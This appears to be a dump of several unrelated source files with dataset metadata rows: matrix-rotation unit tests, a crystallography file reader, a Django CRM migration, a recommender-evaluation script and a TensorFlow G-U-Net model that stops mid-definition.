30: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
45: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
60: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
90: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
}
self.anticlockwise_any_degree_result_dictionary = {
15: [['16', '17', '18', '19', '20', '21', '22'],
['15', '40', '25', '26', '27', '28', '23'],
['14', '39', '41', '42', '43', '29', '24'],
['13', '38', '48', '49', '44', '30', '1'],
['12', '37', '47', '46', '45', '31', '2'],
['11', '36', '35', '34', '33', '32', '3'],
['10', '9', '8', '7', '6', '5', '4']],
30: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
45: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
60: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
90: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
}
def test_rotate_matrix_shape_degree_1_clockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=True)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_degree_1_clockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=True)
self.assertEqual(rotated_matrix,
[['24', '1', '2', '3', '4', '5', '6'],
['23', '40', '25', '26', '27', '28', '7'],
['22', '39', '48', '41', '42', '29', '8'],
['21', '38', '47', '49', '43', '30', '9'],
['20', '37', '46', '45', '44', '31', '10'],
['19', '36', '35', '34', '33', '32', '11'],
['18', '17', '16', '15', '14', '13', '12']])
def test_rotate_matrix_shape_degree_1_anticlockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=False)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_degree_1_anticlockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=False)
self.assertEqual(rotated_matrix,
[['2', '3', '4', '5', '6', '7', '8'],
['1', '26', '27', '28', '29', '30', '9'],
['24', '25', '42', '43', '44', '31', '10'],
['23', '40', '41', '49', '45', '32', '11'],
['22', '39', '48', '47', '46', '33', '12'],
['21', '38', '37', '36', '35', '34', '13'],
['20', '19', '18', '17', '16', '15', '14']])
def test_rotate_matrix_shape_any_degree_clockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=True)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_any_degree_clockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=True)
self.assertEqual(
rotated_matrix,
self.clockwise_any_degree_result_dictionary[degree])
def test_rotate_matrix_shape_any_degree_anticlockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=False)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_any_degree_anticlockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=False)
self.assertEqual(
rotated_matrix,
self.anticlockwise_any_degree_result_dictionary[degree])
def test_command_line_interface_options(self):
target_string = 'Show this message and exit.'
runner = CliRunner()
help_result = runner.invoke(matrix_rotation_cli.main, ['--help'])
self.assertEqual(help_result.exit_code, 0)
self.assertTrue(target_string in help_result.output)
def test_command_line_interface_matrix(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = "[['24', '1', '2', '3', '4', '5', '6'], ['23', '40', '25', '26', '27', '28', '7'], ['22', '39', '48', '41', '42', '29', '8'], ['21', '38', '47', '49', '43', '30', '9'], ['20', '37', '46', '45', '44', '31', '10'], ['19', '36', '35', '34', '33', '32', '11'], ['18', '17', '16', '15', '14', '13', '12']]"
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
def test_command_line_interface_degree(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = "[['20', '21', '22', '23', '24', '1', '2'], ['19', '36', '37', '38', '39', '40', '3'], ['18', '35', '44', '45', '46', '25', '4'], ['17', '34', '43', '49', '47', '26', '5'], ['16', '33', '42', '41', '48', '27', '6'], ['15', '32', '31', '30', '29', '28', '7'], ['14', '13', '12', '11', '10', '9', '8']]"
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix, "--degree", 5])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
def test_command_line_interface_clockwise(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = "[['4', '5', '6', '7', '8', '9', '10'], ['3', '28', '29', '30', '31', '32', '11'], ['2', '27', '44', '45', '46', '33', '12'], ['1', '26', '43', '49', '47', '34', '13'], ['24', '25', '42', '41', '48', '35', '14'], ['23', '40', '39', '38', '37', '36', '15'], ['22', '21', '20', '19', '18', '17', '16']]"
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix, "--degree", 3,
"--clockwise", False])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
def test_command_line_interface_print_matrix(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = """Original Matrix:
[['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
Clockwise Rotated Matrix with Degree = 4:
[['21', '22', '23', '24', '1', '2', '3'],
['20', '37', '38', '39', '40', '25', '4'],
['19', '36', '45', '46', '47', '26', '5'],
['18', '35', '44', '49', '48', '27', '6'],
['17', '34', '43', '42', '41', '28', '7'],
['16', '33', '32', '31', '30', '29', '8'],
['15', '14', '13', '12', '11', '10', '9']]
---------------------------------------------
[['21', '22', '23', '24', '1', '2', '3'], ['20', '37', '38', '39', '40', '25', '4'], ['19', '36', '45', '46', '47', '26', '5'], ['18', '35', '44', '49', '48', '27', '6'], ['17', '34', '43', '42', '41', '28', '7'], ['16', '33', '32', '31', '30', '29', '8'], ['15', '14', '13', '12', '11', '10', '9']]"""
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix, "--degree", 4,
"--clockwise", True, "--print_matrix", True])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
if __name__ == '__main__':
unittest.main()
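The degree-1 expectations in these tests come from shifting each concentric ring of the square matrix by one position (clockwise or anticlockwise). A standalone sketch of that ring rotation, independent of the `matrix_rotation` package (`rotate_ring` is an illustrative reimplementation, not the library function):

```python
def rotate_ring(matrix, degree=1, clockwise=True):
    """Rotate each concentric ring of a square matrix by `degree` steps."""
    n = len(matrix)
    result = [row[:] for row in matrix]
    for layer in range(n // 2):
        lo, hi = layer, n - 1 - layer
        # Ring coordinates in clockwise order, starting at the top-left corner.
        coords = ([(lo, c) for c in range(lo, hi)] +      # top row, left to right
                  [(r, hi) for r in range(lo, hi)] +      # right column, downwards
                  [(hi, c) for c in range(hi, lo, -1)] +  # bottom row, right to left
                  [(r, lo) for r in range(hi, lo, -1)])   # left column, upwards
        values = [matrix[r][c] for r, c in coords]
        shift = degree % len(coords)
        if shift:
            if clockwise:
                values = values[-shift:] + values[:-shift]
            else:
                values = values[shift:] + values[:shift]
        for (r, c), v in zip(coords, values):
            result[r][c] = v
    return result

rotate_ring([['a', 'b'], ['d', 'c']])  # -> [['d', 'a'], ['c', 'b']]
```

Because rings of a 7x7 matrix have 24, 16, and 8 cells, each ring is shifted modulo its own length, and the centre cell (here '49') never moves.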
# File: MillerArrays/millerMtzImports.py (MooersLab/jupyterlabcctbxsnipsplus, MIT)
# Description: Read a mtz file into a miller array.
# Source: NA
"""
from iotbx.reflection_file_reader import any_reflection_file
hkl_file = any_reflection_file("${1:3hz7.mtz}")
miller_arrays = hkl_file.as_miller_arrays(merge_equivalents=False)
"""
from iotbx.reflection_file_reader import any_reflection_file
hkl_file = any_reflection_file("3hz7.mtz")
miller_arrays = hkl_file.as_miller_arrays(merge_equivalents=False)
| 32.615385 | 66 | 0.816038 | 64 | 424 | 5.03125 | 0.375 | 0.26087 | 0.21118 | 0.142857 | 0.850932 | 0.850932 | 0.850932 | 0.850932 | 0.850932 | 0.850932 | 0 | 0.012987 | 0.091981 | 424 | 12 | 67 | 35.333333 | 0.823377 | 0.563679 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
64eadc0dffcd5e0c6737f03b669d1136244f82d9 | 108 | py | Python | litex/build/altera/__init__.py | osterwood/litex | db20cb172dc982c5879aa8080ec7aa18de181cc5 | [
"ADSL"
] | 1,501 | 2016-04-19T18:16:21.000Z | 2022-03-31T17:46:31.000Z | litex/build/altera/__init__.py | osterwood/litex | db20cb172dc982c5879aa8080ec7aa18de181cc5 | [
"ADSL"
] | 1,135 | 2016-04-19T05:49:14.000Z | 2022-03-31T15:21:19.000Z | litex/build/altera/__init__.py | osterwood/litex | db20cb172dc982c5879aa8080ec7aa18de181cc5 | [
"ADSL"
] | 357 | 2016-04-19T05:00:24.000Z | 2022-03-31T11:28:32.000Z | from litex.build.altera.platform import AlteraPlatform
from litex.build.altera.programmer import USBBlaster
| 36 | 54 | 0.87037 | 14 | 108 | 6.714286 | 0.642857 | 0.191489 | 0.297872 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 108 | 2 | 55 | 54 | 0.94 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
64f07a4446dcb8c696bcf6e538a2fae382c48c78 | 4,426 | py | Python | crm/migrations/0005_auto_20161023_1605.py | bpatyi/simpleCRM | bf74f0e0d783ea4538fb96b6790474d991175b51 | [
"MIT"
] | 2 | 2016-10-03T08:35:07.000Z | 2016-10-04T07:22:20.000Z | crm/migrations/0005_auto_20161023_1605.py | bpatyi/simpleCRM | bf74f0e0d783ea4538fb96b6790474d991175b51 | [
"MIT"
] | null | null | null | crm/migrations/0005_auto_20161023_1605.py | bpatyi/simpleCRM | bf74f0e0d783ea4538fb96b6790474d991175b51 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-23 16:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crm', '0004_auto_20161023_1143'),
]
operations = [
migrations.RenameField(
model_name='inboundcontactaddress',
old_name='city',
new_name='administrative_area',
),
migrations.RenameField(
model_name='inboundcontactaddress',
old_name='address',
new_name='formatted_address',
),
migrations.RenameField(
model_name='individualaddress',
old_name='city',
new_name='administrative_area',
),
migrations.RenameField(
model_name='individualaddress',
old_name='address',
new_name='formatted_address',
),
migrations.RemoveField(
model_name='inboundcontactaddress',
name='zip_code',
),
migrations.RemoveField(
model_name='individualaddress',
name='zip_code',
),
migrations.AddField(
model_name='inboundcontactaddress',
name='county',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='final_type',
field=models.CharField(blank=True, max_length=32),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='latitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='locality',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='longitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='postal_code',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='postal_code_suffix',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='route',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='inboundcontactaddress',
name='street_number',
field=models.IntegerField(blank=True, default=None),
),
migrations.AddField(
model_name='individualaddress',
name='county',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='individualaddress',
name='final_type',
field=models.CharField(blank=True, max_length=32),
),
migrations.AddField(
model_name='individualaddress',
name='latitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='individualaddress',
name='locality',
field=models.CharField(blank=True, max_length=127),
),
migrations.AddField(
model_name='individualaddress',
name='longitude',
field=models.FloatField(blank=True, default=None),
),
migrations.AddField(
model_name='individualaddress',
name='postal_code',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='individualaddress',
name='postal_code_suffix',
field=models.CharField(blank=True, max_length=16),
),
migrations.AddField(
model_name='individualaddress',
name='route',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='individualaddress',
name='street_number',
field=models.IntegerField(blank=True, default=None),
),
]
| 33.029851 | 64 | 0.569363 | 375 | 4,426 | 6.538667 | 0.189333 | 0.088091 | 0.168842 | 0.198206 | 0.878467 | 0.878467 | 0.827896 | 0.776509 | 0.738173 | 0.738173 | 0 | 0.020979 | 0.321509 | 4,426 | 133 | 65 | 33.278195 | 0.795538 | 0.015364 | 0 | 0.936508 | 1 | 0 | 0.176349 | 0.063146 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015873 | 0 | 0.039683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
64f87cdcd2fb2d91861849cf510ec1f56ec9d32c | 136 | py | Python | build_you/utils/datetime.py | bostud/build_you | 258a336a82a1da9efc102770f5d8bf83abc13379 | [
"MIT"
] | null | null | null | build_you/utils/datetime.py | bostud/build_you | 258a336a82a1da9efc102770f5d8bf83abc13379 | [
"MIT"
] | null | null | null | build_you/utils/datetime.py | bostud/build_you | 258a336a82a1da9efc102770f5d8bf83abc13379 | [
"MIT"
] | null | null | null | import pytz
from datetime import datetime
def datetime_now_tz() -> datetime:
return datetime.now(tz=pytz.timezone('Europe/Kiev'))
| 19.428571 | 56 | 0.757353 | 19 | 136 | 5.315789 | 0.578947 | 0.217822 | 0.257426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132353 | 136 | 6 | 57 | 22.666667 | 0.855932 | 0 | 0 | 0 | 0 | 0 | 0.080882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 8 |
8f30db13ca3de69ffc80454137cf74a6ea82983f | 3,638 | py | Python | src/evaluation/coefficient.py | DiegoCorrea/masters-dissertation | 61d6e9c46da6cf1e7d904f98eb1d46d907a74576 | [
"MIT"
] | null | null | null | src/evaluation/coefficient.py | DiegoCorrea/masters-dissertation | 61d6e9c46da6cf1e7d904f98eb1d46d907a74576 | [
"MIT"
] | null | null | null | src/evaluation/coefficient.py | DiegoCorrea/masters-dissertation | 61d6e9c46da6cf1e7d904f98eb1d46d907a74576 | [
"MIT"
] | null | null | null | import os
from src.config.labels import CALIBRATION_LABEL, FAIRNESS_METRIC_LABEL, EVALUATION_METRIC_LABEL, MAP_LABEL, MACE_LABEL, \
ALGORITHM_LABEL, EVALUATION_VALUE_LABEL, MC_LABEL
from src.config.path_dir_files import coefficient_results_path
import pandas as pd
def coefficient(results_df, db):
save_dir = coefficient_results_path(db) + 'all/'
for divergence in results_df[FAIRNESS_METRIC_LABEL].unique().tolist():
divergence_df = results_df[results_df[FAIRNESS_METRIC_LABEL] == divergence]
for tradeoff in divergence_df[CALIBRATION_LABEL].unique().tolist():
tradeoff_divergence_df = divergence_df[divergence_df[CALIBRATION_LABEL] == tradeoff]
for metric in [MACE_LABEL, MC_LABEL]:
metric_dict = {}
for algorithm in tradeoff_divergence_df[ALGORITHM_LABEL].unique().tolist():
algorithm_tradeoff_divergence_df = tradeoff_divergence_df[
tradeoff_divergence_df[ALGORITHM_LABEL] == algorithm]
map_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == MAP_LABEL]
metric_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == metric]
map_value = map_df[EVALUATION_VALUE_LABEL].mean()
metric_value = metric_df[EVALUATION_VALUE_LABEL].mean()
metric_dict[algorithm] = [round(metric_value/map_value, 2)]
metric_sorted_dict = dict(sorted(metric_dict.items()))
coe_df = pd.DataFrame.from_dict(metric_sorted_dict)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
file_name = "_".join([metric, MAP_LABEL, divergence, tradeoff, '.csv'])
coe_df.to_csv(os.path.join(save_dir, file_name), index=False)
def decision(results_df, db):
save_dir = coefficient_results_path(db) + 'decision/'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
for divergence in results_df[FAIRNESS_METRIC_LABEL].unique().tolist():
divergence_df = results_df[results_df[FAIRNESS_METRIC_LABEL] == divergence]
for tradeoff in divergence_df[CALIBRATION_LABEL].unique().tolist():
tradeoff_divergence_df = divergence_df[divergence_df[CALIBRATION_LABEL] == tradeoff]
metric_dict = {}
for algorithm in tradeoff_divergence_df[ALGORITHM_LABEL].unique().tolist():
algorithm_tradeoff_divergence_df = tradeoff_divergence_df[
tradeoff_divergence_df[ALGORITHM_LABEL] == algorithm]
map_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == MAP_LABEL]
map_value = map_df[EVALUATION_VALUE_LABEL].mean()
dec = 0
for metric in [MACE_LABEL, MC_LABEL]:
metric_df = algorithm_tradeoff_divergence_df[
algorithm_tradeoff_divergence_df[EVALUATION_METRIC_LABEL] == metric]
metric_value = metric_df[EVALUATION_VALUE_LABEL].mean()
dec += round(metric_value/map_value, 2)
metric_dict[algorithm] = [round(dec, 2)]
metric_sorted_dict = dict(sorted(metric_dict.items()))
coe_df = pd.DataFrame.from_dict(metric_sorted_dict)
file_name = "_".join([divergence, tradeoff, '.csv'])
coe_df.to_csv(os.path.join(save_dir, file_name), index=False)
| 55.969231 | 121 | 0.660803 | 417 | 3,638 | 5.352518 | 0.136691 | 0.139785 | 0.16129 | 0.129928 | 0.867384 | 0.854391 | 0.849014 | 0.824373 | 0.730735 | 0.6931 | 0 | 0.001474 | 0.253986 | 3,638 | 64 | 122 | 56.84375 | 0.820929 | 0 | 0 | 0.727273 | 0 | 0 | 0.006322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0 | 0.072727 | 0 | 0.109091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56cb2b65e72b8dc8605024e6cbf1eed21f1d58ae | 20,610 | py | Python | scripts/g_model.py | thatvinhton/G-U-Net | 8a77a8cfc278b7feff8651cf27552aeddc84473d | [
"MIT"
] | 21 | 2019-06-11T01:48:21.000Z | 2021-12-14T07:29:00.000Z | scripts/g_model.py | thatvinhton/G-U-Net | 8a77a8cfc278b7feff8651cf27552aeddc84473d | [
"MIT"
] | 3 | 2020-01-02T03:09:28.000Z | 2020-03-26T13:39:55.000Z | scripts/g_model.py | thatvinhton/G-U-Net | 8a77a8cfc278b7feff8651cf27552aeddc84473d | [
"MIT"
] | 5 | 2019-11-22T17:15:53.000Z | 2022-03-09T02:56:04.000Z | from scripts.network import Network
class G_UNetResidual_Ext2(Network):
def getOutput(self):
return self.layers['conv9_gl']
def setup(self, is_training, num_classes):
(self.feed('data')
.g_conv('Z2', 'C4', 7, 32, 1, 1, padding='SAME', name='conv1_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv1_bn1')
#.dropout(keep_prob=0.9, is_training=is_training, name='conv1_dr1')
.relu(name='conv1_rl1')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv1_mp1'))
(self.feed('conv1_rl1')
.g_residual_block(use_dropout=False, name='conv1_add_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual6', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual7', padding='SAME')
.g_residual_block(use_dropout=False, name='conv1_add_residual8', padding='SAME')
)
(self.feed('conv1_mp1')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv2_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr1')
.relu(name='conv2_rl1')
.g_residual_block(use_dropout=False, name='conv2_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr2')
.relu(name='conv2_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv2_mp1'))
(self.feed('conv2_rl2')
.g_residual_block(use_dropout=False, name='conv2_add_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_add_residual6', padding='SAME')
)
(self.feed('conv2_mp1')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv3_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr1')
.relu(name='conv3_rl1')
.g_residual_block(use_dropout=False, name='conv3_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr2')
.relu(name='conv3_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv3_mp1'))
(self.feed('conv3_rl2')
.g_residual_block(use_dropout=False, name='conv3_add_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_add_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_add_residual3', padding='SAME')
)
(self.feed('conv3_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv4_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr1')
.relu(name='conv4_rl1')
.g_residual_block(use_dropout=False, name='conv4_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr2')
.relu(name='conv4_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv4_mp1'))
(self.feed('conv4_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr1')
.relu(name='conv5_rl1')
.g_residual_block(use_dropout=False, name='conv5_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr2')
.relu(name='conv5_rl2')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr3')
.relu(name='conv5_rl3')
.upsampling(name='conv5_up'))
(self.feed('conv5_up', 'conv4_rl2')
.g_concat(name='conv6_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn0')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv6_1')
